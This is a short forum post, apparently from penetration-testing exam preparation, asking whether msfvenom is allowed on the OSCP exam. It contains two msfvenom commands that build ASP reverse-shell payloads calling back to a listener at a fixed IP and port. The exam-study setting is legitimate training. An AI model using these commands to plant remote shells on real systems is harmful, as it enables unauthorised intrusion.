Options

msfvenom ok for oscp exam?

mabraFoomabraFoo Member Posts: 23 ■□□□□□□□□□
I know you can't use metasploit for every machine on the oscp exam, but what about msfvenom? If I create a malicious asp file like this, is that considered using metasploit?

msfvenom -p windows/meterpreter/reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp

What about this? (shell_reverse_tcp)


msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp

Comments

Sign In or Register to comment.